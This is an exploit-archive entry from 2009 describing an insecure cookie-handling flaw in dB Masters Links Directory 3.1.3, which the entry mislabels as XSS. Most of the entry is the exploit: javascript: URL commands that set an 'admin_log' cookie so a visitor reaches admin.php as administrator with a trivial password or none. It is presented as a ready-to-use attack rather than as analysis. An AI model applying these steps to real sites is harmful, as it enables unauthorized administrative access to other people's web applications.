id: 10419
date: 12/26/2009
title: dB Masters Multimedia Insecure Cookie Handling Vulnerability
author: indoushka
cves: 

============================================================
dB Masters Multimedia Insecure Cookie Handling Vulnerability
============================================================

========================================================================================                 
| # Title    : dB Masters Multimedia Insecure Cookie Handling Vulnerability            |
| # Author   : indoushka                                                               |
| # Script   : Powered by dB Masters Multimedia (dB Masters Links Directory 3.1.3)     |
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)       |
| # Bug      : XSS                                                                     |
======================      Exploit By indoushka       =================================
| # Exploit  :
|
| 1- http://server/links/admin.php
| 2- javascript:document.cookie="admin_log=in;path=/";
| login whith the pass "in"
| 3- javascript:document.cookie="admin_log=indoushka;path=/";
| login whith out pss
| tested in Opera V.10



#  0day.today [2023-03-23]  #